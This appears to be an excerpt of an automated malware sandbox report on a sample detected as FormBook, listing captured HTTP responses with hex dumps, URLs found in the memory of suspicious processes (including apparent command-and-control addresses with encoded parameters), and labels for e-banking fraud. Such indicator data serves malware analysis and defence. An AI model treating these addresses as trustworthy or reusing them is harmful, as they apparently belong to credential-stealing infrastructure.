Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Sep 2024 07:07:11 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Sep 2024 07:07:14 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 05 Sep 2024 07:07:16 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Sep 2024 07:07:39 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-05T07:07:44.2919526Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Sep 2024 07:07:41 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 18X-Rate-Limit-Reset: 2024-09-05T07:07:44.2919526Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Thu, 05 Sep 2024 07:07:44 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-09-05T07:07:49.3733400Z
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:07:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2umUvE2zDX6DUbixj6JOaPfQJ8o9EfEbqXah%2BIfipLe8Dj7VJURSz%2BL37GkEPpLtgnAozv1Gw24mkovTscXoDBbVNEDBQd8ApobHDmID0EmOJfcpVeF5t2nfVMVWX5TxHnI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8be46276be9e430f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 fb 73 d3 46 fa e7 30 c3 ff b0 d5 75 ea 64 26 96 ec 24 f4 91 da 66 5a a6 d3 7b 97 6b e9 cd cd 71 34 b3 96 d6 f6 82 a4 15 d2 da 21 30 9d 71 4a 12 62 42 1e e5 91 e6 e1 34 04 48 c3 41 f3 00 12 1a f2 fc 63 f0 4a f2 4f f9 17 6e 56 b2 1d 3b 21 0e 50 b8 21 e3 58 de dd ef bd df 63 f7 53 e4 3d 85 c8 b4 cb 40 20 45 35 35 76 f4 48 a4 f2 44 50 e1 4f 0d 51 08 e4 14 34 2d 44 a3 42 9a 26 82 1f 0b 95 79 1d 6a 28 2a 98 48 57 90 89 4c 01 c8 44 a7 48 a7 51 a1 13 c5 cf 61 ba 0b 98 a2 d4 08 a2 f3 69 9c 89 0a ff 0a 7e fb 59 f0 04 d1 0c 48 71 5c 45 55 58 7f fa 22 8a 94 24 6a 96 53 26 d1 50 34 bc 97 11 34 0c 15 cb 30 ae a2 a0 82 32 58 46 42 05 d5 90 9b 35 12 c7 2a da 8b 93 c1 a8 d3 20 26 ad 16 0e 2b 34 15 f5 29 04 bd 41 b3 86 75 ac a5 b5 a0 25 43 15 45 c3 cd 58 c7 14 43 b5 3c f6 88 52 4c 55 14 6b 0b b5 bd 07 d8 e2 b3 c2 ea a0 bb f2 db ce c6 b5 e2 cc 4a 71 ea 8e 9d 7f 60 e7 b6 58 ff 12 08 02 67 68 c0 cd f6 ba 83 77 dd 6c d6 be b9 ee dc 9a 2d 3c 1b 60 0b 4f 23 92 4f e2 e8 91 88 8a f5 73 20 65 a2 44 54 e0 a6 69 97 a4 ce ce 4e 51 4e 61 1d 22 5d 24 66 52 ba 18 ef 48 5b c8 b4 24 9a 42 1a 92 ba 94 70 b8 e5 58 c2 44 48 b2 68 97 8a 24 d9 b2 a4 04 d1 69 10 76 22 8b 68 48 d4 b0 2e ca 96 25 00 13 a9 51 c1 03 b2 52 08 f9 9b f0 66 f8 59 9d d8 40 66 b0 4d 6c 15 5b 5f 82 df de 05 c0 1d 2d 2a 50 74 81 4a 1e e6 ef 16 48 27 a6 06 55 7c 11 f9 92 48 ff 27 d6 de 77 d9 00 c7 33 d1 b0 d8 22 b6 95 d8 5b b2 89 0d 0a 2c 53 ae 47 de ea b2 28 d2 24 1f 58 3a 7b 3e 8d cc ae 60 0b 27 e3 91 3d 6b d5 48 7c 16 66 a0 0f 2a c4 22 25 a4 d7 e5 75 31 ae 92 a4 91 32 de 26 0f b9 83 67 91 8e b3 56 07 54 14 d1 48 19 2f c5 49 f2 52 4e 24 4e 94 Data Ascii: a50sF0ud&$fZ{kq4!0qJbB4HAcJOnV;!P!XcS=@ E55vHDPOQ4-DB&yj(HWLDHQai~YHq\EUX"$jS&P4402XFB5 &+4)Au%CEXC<RLUkJq`Xghwl-<`O#Os eDTiNQNa"]$fRH[$BpXDHh$iv"hH.%QRfY@fMl[_-PtJH'U\|H'w3"[,SG($X:{>`'=kH\|f"%u12&gVTH/IRN$N
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:07:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2umUvE2zDX6DUbixj6JOaPfQJ8o9EfEbqXah%2BIfipLe8Dj7VJURSz%2BL37GkEPpLtgnAozv1Gw24mkovTscXoDBbVNEDBQd8ApobHDmID0EmOJfcpVeF5t2nfVMVWX5TxHnI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8be46276be9e430f-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 fb 73 d3 46 fa e7 30 c3 ff b0 d5 75 ea 64 26 96 ec 24 f4 91 da 66 5a a6 d3 7b 97 6b e9 cd cd 71 34 b3 96 d6 f6 82 a4 15 d2 da 21 30 9d 71 4a 12 62 42 1e e5 91 e6 e1 34 04 48 c3 41 f3 00 12 1a f2 fc 63 f0 4a f2 4f f9 17 6e 56 b2 1d 3b 21 0e 50 b8 21 e3 58 de dd ef bd df 63 f7 53 e4 3d 85 c8 b4 cb 40 20 45 35 35 76 f4 48 a4 f2 44 50 e1 4f 0d 51 08 e4 14 34 2d 44 a3 42 9a 26 82 1f 0b 95 79 1d 6a 28 2a 98 48 57 90 89 4c 01 c8 44 a7 48 a7 51 a1 13 c5 cf 61 ba 0b 98 a2 d4 08 a2 f3 69 9c 89 0a ff 0a 7e fb 59 f0 04 d1 0c 48 71 5c 45 55 58 7f fa 22 8a 94 24 6a 96 53 26 d1 50 34 bc 97 11 34 0c 15 cb 30 ae a2 a0 82 32 58 46 42 05 d5 90 9b 35 12 c7 2a da 8b 93 c1 a8 d3 20 26 ad 16 0e 2b 34 15 f5 29 04 bd 41 b3 86 75 ac a5 b5 a0 25 43 15 45 c3 cd 58 c7 14 43 b5 3c f6 88 52 4c 55 14 6b 0b b5 bd 07 d8 e2 b3 c2 ea a0 bb f2 db ce c6 b5 e2 cc 4a 71 ea 8e 9d 7f 60 e7 b6 58 ff 12 08 02 67 68 c0 cd f6 ba 83 77 dd 6c d6 be b9 ee dc 9a 2d 3c 1b 60 0b 4f 23 92 4f e2 e8 91 88 8a f5 73 20 65 a2 44 54 e0 a6 69 97 a4 ce ce 4e 51 4e 61 1d 22 5d 24 66 52 ba 18 ef 48 5b c8 b4 24 9a 42 1a 92 ba 94 70 b8 e5 58 c2 44 48 b2 68 97 8a 24 d9 b2 a4 04 d1 69 10 76 22 8b 68 48 d4 b0 2e ca 96 25 00 13 a9 51 c1 03 b2 52 08 f9 9b f0 66 f8 59 9d d8 40 66 b0 4d 6c 15 5b 5f 82 df de 05 c0 1d 2d 2a 50 74 81 4a 1e e6 ef 16 48 27 a6 06 55 7c 11 f9 92 48 ff 27 d6 de 77 d9 00 c7 33 d1 b0 d8 22 b6 95 d8 5b b2 89 0d 0a 2c 53 ae 47 de ea b2 28 d2 24 1f 58 3a 7b 3e 8d cc ae 60 0b 27 e3 91 3d 6b d5 48 7c 16 66 a0 0f 2a c4 22 25 a4 d7 e5 75 31 ae 92 a4 91 32 de 26 0f b9 83 67 91 8e b3 56 07 54 14 d1 48 19 2f c5 49 f2 52 4e 24 4e 94 Data Ascii: a50sF0ud&$fZ{kq4!0qJbB4HAcJOnV;!P!XcS=@ E55vHDPOQ4-DB&yj(HWLDHQai~YHq\EUX"$jS&P4402XFB5 &+4)Au%CEXC<RLUkJq`Xghwl-<`O#Os eDTiNQNa"]$fRH[$BpXDHh$iv"hH.%QRfY@fMl[_-PtJH'U\|H'w3"[,SG($X:{>`'=kH\|f"%u12&gVTH/IRN$N
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:07:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gkbH0EwfZa1Wzt5EUGrMXmUao14gf2VrNKU0f6eMcptzuNq7RQNT%2Bz1is5N63RzERBCLC%2B1zHjQusycZsw2og8KC9pGgKhR%2BDlTf7MKFepY%2FDz9Ku%2FDaTcadHjDRx2du2wg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8be462881b3f17ed-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 61 35 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 19 fb 73 d3 46 fa e7 30 c3 ff b0 d5 75 ea 64 26 96 ec 24 f4 91 da 66 5a a6 d3 7b 97 6b e9 cd cd 71 34 b3 96 d6 f6 82 a4 15 d2 da 21 30 9d 71 4a 12 62 42 1e e5 91 e6 e1 34 04 48 c3 41 f3 00 12 1a f2 fc 63 f0 4a f2 4f f9 17 6e 56 b2 1d 3b 21 0e 50 b8 21 e3 58 de dd ef bd df 63 f7 53 e4 3d 85 c8 b4 cb 40 20 45 35 35 76 f4 48 a4 f2 44 50 e1 4f 0d 51 08 e4 14 34 2d 44 a3 42 9a 26 82 1f 0b 95 79 1d 6a 28 2a 98 48 57 90 89 4c 01 c8 44 a7 48 a7 51 a1 13 c5 cf 61 ba 0b 98 a2 d4 08 a2 f3 69 9c 89 0a ff 0a 7e fb 59 f0 04 d1 0c 48 71 5c 45 55 58 7f fa 22 8a 94 24 6a 96 53 26 d1 50 34 bc 97 11 34 0c 15 cb 30 ae a2 a0 82 32 58 46 42 05 d5 90 9b 35 12 c7 2a da 8b 93 c1 a8 d3 20 26 ad 16 0e 2b 34 15 f5 29 04 bd 41 b3 86 75 ac a5 b5 a0 25 43 15 45 c3 cd 58 c7 14 43 b5 3c f6 88 52 4c 55 14 6b 0b b5 bd 07 d8 e2 b3 c2 ea a0 bb f2 db ce c6 b5 e2 cc 4a 71 ea 8e 9d 7f 60 e7 b6 58 ff 12 08 02 67 68 c0 cd f6 ba 83 77 dd 6c d6 be b9 ee dc 9a 2d 3c 1b 60 0b 4f 23 92 4f e2 e8 91 88 8a f5 73 20 65 a2 44 54 e0 a6 69 97 a4 ce ce 4e 51 4e 61 1d 22 5d 24 66 52 ba 18 ef 48 5b c8 b4 24 9a 42 1a 92 ba 94 70 b8 e5 58 c2 44 48 b2 68 97 8a 24 d9 b2 a4 04 d1 69 10 76 22 8b 68 48 d4 b0 2e ca 96 25 00 13 a9 51 c1 03 b2 52 08 f9 9b f0 66 f8 59 9d d8 40 66 b0 4d 6c 15 5b 5f 82 df de 05 c0 1d 2d 2a 50 74 81 4a 1e e6 ef 16 48 27 a6 06 55 7c 11 f9 92 48 ff 27 d6 de 77 d9 00 c7 33 d1 b0 d8 22 b6 95 d8 5b b2 89 0d 0a 2c 53 ae 47 de ea b2 28 d2 24 1f 58 3a 7b 3e 8d cc ae 60 0b 27 e3 91 3d 6b d5 48 7c 16 66 a0 0f 2a c4 22 25 a4 d7 e5 75 31 ae 92 a4 91 32 de 26 0f b9 83 67 91 8e b3 56 07 54 14 d1 48 19 2f c5 49 Data Ascii: a5csF0ud&$fZ{kq4!0qJbB4HAcJOnV;!P!XcS=@ E55vHDPOQ4-DB&yj(HWLDHQai~YHq\EUX"$jS&P4402XFB5 &+4)Au%CEXC<RLUkJq`Xghwl-<`O#Os eDTiNQNa"]$fRH[$BpXDHh$iv"hH.%QRfY@fMl[_-PtJH'U\|H'w3"[,SG($X:{>`'=kH\|f"%u12&gVTH/I
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Sep 2024 07:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingProduct: Z-BlogPHP 1.7.3X-XSS-Protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A9cc5mqBCL6nJnBkHV9HQg25w79ykswrd31JRgvuMLQ6wBRC7WCw0lhMr6IFoOiP5aU2OC5YGI2mC1zl6K4dxsc664QiwrWORQ%2FoFP4Emp4m%2FZk8aYQlcZY%2Bw%2FVjEKVQpkY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8be46297fff54249-EWRalt-svc: h3=":443"; ma=86400Data Raw: 31 65 39 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 21 20 e5 af b9 e4 b8 8d e8 b5 b7 ef bc 8c e9 a1 b5 e9 9d a2 e6 9c aa e6 89 be e5 88 b0 20 2d 20 e7 8e 8b e8 80 85 e8 8d a3 e8 80 80 e6 94 bb e7 95 a5 e4 b9 8b e5 ae b6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 68 69 6e 61 65 6e 2e 6f 72 67 2f 7a 62 5f 75 73 65 72 73 2f 74 68 65 6d 65 2f 79 64 31 31 32 35 66 72 65 65 2f 73 74 79 6c 65 2f 63 73 73 2f 73 77 69 70 65 72 2d Data Ascii: 1e97<!doctype html><html><head><meta charset="utf-8"><meta name="renderer" content="webkit"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="applicable-device"content="pc,mobile"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><title>404! - </title><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/font-awesome.min.css" rel="stylesheet"><link href="http://www.chinaen.org/zb_users/theme/yd1125free/style/css/swiper-

Source: fhSlYsGoxBSrK.exe, 00000005.00000002.753541101.0000000001EE5000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.chinaen.org
Source: fhSlYsGoxBSrK.exe, 00000005.00000002.753541101.0000000001EE5000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.chinaen.org/mquw/
Source: fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.000000000429C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.nobartv6.website/pp43/?38R0=jHY4nFvHAVc8&A8_pSPdX=/yzCblrJsERuqgz3jNPVh3QXFKomWtIu
Source: netbtugc.exe, 00000004.00000002.754382452.0000000061ECD000.00000008.00000001.01000000.00000007.sdmp, sqlite3.dll.4.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: netbtugc.exe, 00000004.00000003.465330619.0000000006171000.00000004.00000020.00020000.00000000.sdmp, 01194HH4.4.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: netbtugc.exe, 00000004.00000002.753781292.0000000001F50000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.0000000003930000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://whois.gandi.net/en/results?search=languagemodel.pro
Source: netbtugc.exe, 00000004.00000002.753781292.0000000001908000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.00000000032E8000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.477475123.0000000000DB8000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://www.elsupertodo.net/2jit/?A8_pSPdX=iS4P4oRSl8BXKzGHILRVAF4LAAl1IYK6JXAZlPSQukWhX6ryYmutxv
Source: netbtugc.exe, 00000004.00000002.753781292.0000000001F50000.00000004.10000000.00040000.00000000.sdmp, fhSlYsGoxBSrK.exe, 00000005.00000002.753610355.0000000003930000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.gandi.net/en/domain
Source: 01194HH4.4.dr	String found in binary or memory: https://www.google.com/favicon.ico

E-Banking Fraud

Yara detected FormBook

